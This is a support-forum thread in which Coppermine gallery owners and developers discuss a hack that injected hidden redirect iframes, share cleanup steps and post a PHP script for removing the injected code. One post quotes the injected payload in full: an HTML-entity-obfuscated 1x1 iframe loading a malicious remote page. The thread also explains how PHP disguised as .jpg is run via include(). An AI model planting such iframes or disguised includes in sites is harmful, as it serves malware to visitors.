Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

[Joachim Müller]

The guy who owns the domain may or may not be the creator of the hack. The whois record shows who owns the domain, nothing more, nothing less. You can't prove anything with that - if you sue him, the guy will claim that the hacker has redirected your site to his domain and that he The owner of cdpuvbhfzz.com) was not aware of that. Try to prove him wrong - you can't. The only thing you could actually do is try to figure out how this guy makes a living. Once you figured out, try to alert his business partners of his reputation. If they don't care, you're probably stuck, so the only thing you could probably do are illegal things (DDOS attacks against his server and such stuff), which would bring you on the same level with the moron who performed the attack. This is something I wouldn't even consider. Sometimes, it makes me angry what some people do on the internet, and I would love to visit them and beat them up. But then, this is of course a childish fantasy that would not help at all (and one that would get me into serious troubles), so it's not an option neither.
So what are we going to do against the jerk who triggered the attacks? I'll tell you: nothing. There is nothing we can do. I'm not willing to even think about possible actions against that jerk - he's a low-life moron, an insect, a parasite. I pity him - what a poor method to make a living.

My website has been hacked too. The hacker uploaded somehow "45563131x.jpg" file (this is a php file, not an image!) to the "~/coppermine/albums/userpics/10001" folder.

see my instructions:

• Zip archives or jpeg files are not harmful by themselves on the server, as they can not be executed on the server (at least if the server is configured properly). This being said, it doesn't hurt if a malevolent user manages to upload a file named "I_am_evil.jpg" to your webserver that actually isn't a jpeg image, but just a plain text PHP-file that contains malicious code that he renamed from I_am_evil.php to I_am_evil.jpg on his client before uploading it. Without the corresponding configuration, such a file can not do harm. However, it's a trick hackers frequently use to disguise their payload files from the eye of the legitimate site owner: if they manage to break your site's security by modifying an existing PHP file, they can inject code into that PHP file that uses PHP's include command to actually execute the code within I_am_evil.jpg.
  Let me give you an example: there is a legitimate PHP file http://your_site.tld/coppermine/upload.php - if an attacker manages to manipulate that file and add a code line like this: include('albums/userpics/100023/picture.jpg'); and then manages to upload the malicious file http://your_site.tld/coppermine/albums/userpics/100023/picture.jpg to your server that actually isn't a jpeg file, but a script file in disguise, the payload contained in that file will be executed. If you manage to sanitize the file http://your_site.tld/coppermine/upload.php (e.g. remove the offending include line), the malicious jpeg file can no longer do harm, so it won't hurt if it is still a leftover from the attack. The same trick can be used by attackers to disguise their payload in all other files that might look innocent (like zip files or similar).

[Marius]

Hi all
As many more sites lately, mine was hacked aswell. It was more or less same MO, but seems that i was "lucky" compared to others (no db changes, no hidden php in zips or jpgs), only 3 files was changed from what i have found, displayimage.php, index.php and thumbnails.php, though i 've found in plugins folder a script, i attached it so the devs can find more usefull info on this matter. Hope this helps...

Regards

[Marius]

Upss.. forgot to mention: this time domain was other, caatadgouk.com, but still same Ukrtelegroup Ltd that was mention somewhere in this thread...

Code Select Expand

<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#97;&#97;&#116;&#97;&#100;&#103;&#111;&#117;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#52;&#51;&#54;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>

[MrWells]

Shame I missed the script! Would have saved me some work I suspect.

Coppermine and a SMF forum were hit.

I Downloaded the forum to my PC and cleaned it with a rough & ready VB program as no upgrade available.

I upgraded Coppermine to .16 removed zip files etc. and about to go to .18 however....

All of my intermediate pictures appear to have vanished! Replaced with "Click to view full size image" button 
The thumbnail and full size image still exist.  I assume it was caused by the hack? Is there a fix for this please?

[MrWells]

PS

Create intermediate pictures

is/was set

[MyWebsiteAdviser]

Joachim Müller, thank a lot for your explanation.

Alex Webs.

[Nibbler]

Check the size of intermediate images in config. The hack sometimes sets it to 1px.

[MrWells]

Size still set to 600px

Can I find the pics to see if they exist?
if not can I force them to be created, if they do, how can I reference them?

[Nibbler]

Rebuild them in admin tools. If that doesn't work then start a new thread.

[empfl]

...I attach the file with this post, download and rename it to cure.php, upload to your site & run it.

last update: change some function to make the cure script run successful in more case.

I want to use this script, but sorry it doesn't work.


I get the following message:

"""Parse error: syntax error, unexpected $end in /homepages/xx/yyyyyyyyy/htdocs/cure.php on line 93"""

[severeidaho]

I read thru most of these Replies.  I first found I had a problem cause my Config for the main page changed dramatically as well as I saw a Zip file in one of my albums.  I deleted this ZIP file, which could have been a PHP file.  My first thought was that someone Bruteforced my Gallery and got my password.  I changed my password only to find that the next day my Main page was out of wack again.  In the "show how many albums, rows, etc everything was changed to "1".  Also after reading these replies I found that my "path to custom header include" was directing to "albums/userpics/10001/45563131x.jpg" which is incorrect as I dont use a custom header that way. 

My gallery is OFFLINE and in Debug mode.  I will be upgrading from 1416 to the latest asap. 

-gerrit

[Nibbler]

Setting it offline won't stop anything, neither will debug mode.

[severeidaho]

Hi Nibbler,   Thanks for letting me know.  I did disable the URI, but because this thread is soo huge I am sure I missed alot of fixes.  Any chance for a Sticky on Precautions to take with this Problem. 

BTW:  Anyone else have problems outside of CPG and forum and blog setups?  I noticed that my Main page also has a Script which is detected with Windows Live one Care as "html exploit". 

I have contacted my Host for help but am also looking for Solutions. 

Thanks...

-gerrit

[Nibbler]

There are no precautions. You can use the new copy of bridge/coppermine.inc.php mentioned in the announcement post to patch your gallery though (will probably work on any 1.4.x). The hack that's in the wild will spread to all php/html files you made writeable in your webspace/webserver.

[severeidaho]

Anyone answer whether or not the "Yikes my site has been hacked thread" was posted prior to 1418?  Reason I ask is that I am under the impression that upgrading to this latest release fixes the exploit, yet all other php files on the webhost are still needed to be fixed?  The Exploit alone is only driven thru CPG correct? Thus eliminating Older versions by Upgrading to the latest version will end the Problem, yet infected php pages outside of CPG still need to be cleaned?

Thanks. 

[Joachim Müller]

The "Yikes, I've been hacked! Now what?" thread has been written on 2008-04-15. As it contains reference to cpg1.4.18, it must have been written after the release of cpg1.4.18, don't you agree? The announcement thread for cpg1.4.18 has been written on 2008-04-14.
Anyway, the "Yikes" thread is generic: it explains what you need to do to sanitize your gallery no matter what - it does not only apply for the cdpuvbhfzz.com hack, but for others as well that may come after it and that might exploit the same vulnerability that existed in all cpg1.4.x versions before cpg1.4.18. That's why it doesn't contain reference to the attack pattern of the cdpuvbhfzz.com-hack (the iframes trick) - the pattern (payload) may differ in future exploits of the pre-cpg1.4.18 vulnerability.
Don't believe what non-experts on this thread said or suggested: after all, they are no experts and their suggestions are just speculation. Believe us (the coppermine dev team members, particularly Nibbler, who spotted and fixed the vulnerability).
To make this absolutely clear: there is absolutely nothing that you can do that makes it acceptable to delay the upgrade to cpg1.4.18 and the sanitization discussed in "Yikes". Your gallery will be vulnerable if you don't upgrade, no matter wether you allow URI uploads, no matter if you're the only user on your gallery or not, no matter whether your gallery is public or private, no matter wether you enabled debug_mode, no matter wether you set your gallery to offline mode. The exploit will not play by the rules and respect permissions. It's up to you all (infected or not) to fix your gallery now! I have little sympathy for people who are aware that the hack is in the wild and that their gallery is outdated, yet they fail to upgrade. Repeat: perform the upgrade. Do so now; "now" as in "today", this very moment, immediately.

Joachim

[keithjr]

Ok i have had this hit my server (not keeping up with updates ftl)... and wrote a script that goes through and corrects all of your files.

step 1) make a text file with the exact text of the code you want removed (those few lines of php code at the bottom of every php page) - call it say badcode.txt. save it on the root of your web server.

step 2) make a php file, say named fixit.php

i threw this as the code:

Code Select Expand

<pre>
Fixit MMMMM


<?php
$badcode = file_get_contents("badcode.txt");

function parse_dir($dir)
{
  global $badcode;
  
  if ($handle = opendir($dir)) 
  {
    while (false !== ($file = readdir($handle))) 
    { 
      if (is_dir($file) == false)
      {
        $fn = explode(".",$file);
        if ($fn[sizeof($fn)-1] == "php")
        {
          $filename = $dir."/".$file;
          // good, parse it.
          print("Attempting fix on $filename ........");
          $badfile = file_get_contents($filename);
          $isitbad = strpos($badfile,$badcode);
          if ($isitbad == 0)
          {
            print("Fix not required.\n");
          }
          else
          {
            $goodfile = str_replace($badcode,"",$badfile);
            if (file_put_contents($filename,$goodfile))
              print("OK<br>");
            else
              print("Nope.<br>");
          }
        }
      }
      if (($file != ".") and ($file != "..") and is_dir($dir."/".$file))
         parse_dir($dir."/".$file);
  }
  closedir($handle); 
  }
}


parse_dir(".");
?>

Run it, and it will tell you what was infected and was able to fix (or not fix), and what was clean.

Hope it helps some other people as it did me.

[severeidaho]

I did not get a chance to use your code (poster above me) as I just spent quite a while going thru my Gallery directory and rest of my website. After Upgrading to 1418 I believe I have eliminated all those Iframe's.  Turns out the Only Files that were messed with were the Ones I left chmod 777.  I also noticed that with FileZilla for the "user" the Files that were messed with were named "nobody" which has been explained to me as a WebApache footprint.  Anyways I just wanted to post what all I did to fix my website. 

First and foremost,  I went thru the "yikes, My website was hacked" thread and followed the advice of Going thru my Albums and making sure there were no "php, html and any other executable files".  I found that in the "userpics" folder there were folders named "10011" etc, each came with an "index.html" or Index.php" in each of these pages the Iframe code was there, I removed the code and moved on.  In the Logs folder under the Gallery root out of 4 pages, 3 had the code, I removed that.  I also found that in the Gallery root the Files named "banner & bannermgr.php" also had the code since they were chmodded 777.  Note that as I am cleaning these files I changing the chmod to 755. 

My CPMFETCH installation was messed with as well from chmod 777.  This is why my main page (non cpg related) also had the code attahed for redirect.  In the cpmfetch folder the file named "cpmfetch_config.php" was messed with.  Best way I can describe it is the code appeared to be Legitamitely calling for an Image like the usual cpmfetch code calls for images.  There was a <php> call and then the code linked to the userpics album in gallery and then named images that I never added and then followed by the iframe code.  This code, if it makes sense to you (the reader) made it possible for any page that used CPMFETCH to allow for the redirect which in turn gave you a trojan unless you had a good anti virus. 

My wordpress installation was safe since the software itself checks for wrong chmods, etc.  I still upgraded to the latest build to prevent this from happening again. 

By the way,  If you find that You cant delete a file with ftp due to 553 permission denied.  Just contact your Host and they will fix it.  You can also run a cgi script to Fix the user to yourself as the user "nobody" which created the files doesnt allow you as an admin to chmod or delete or even edit for that matter. 

I truly hope I didnt leave anything out and hope this info helps you to clean your Online website and files. 

-gerrit

[Ralf Night]

It touched me too, what i have to do? Is there any answer or menagament just tell: Upgrade your gallery, change your password etc?

[Joachim Müller]

There is an entire thread that you're replying to that you don't read, but reply anyway? There is a sanitization thread that has been mentioned countless times already. Do as suggested in that thread. You have a notorious record of not respecting board rules; do us all a favor and just respect them now, will you?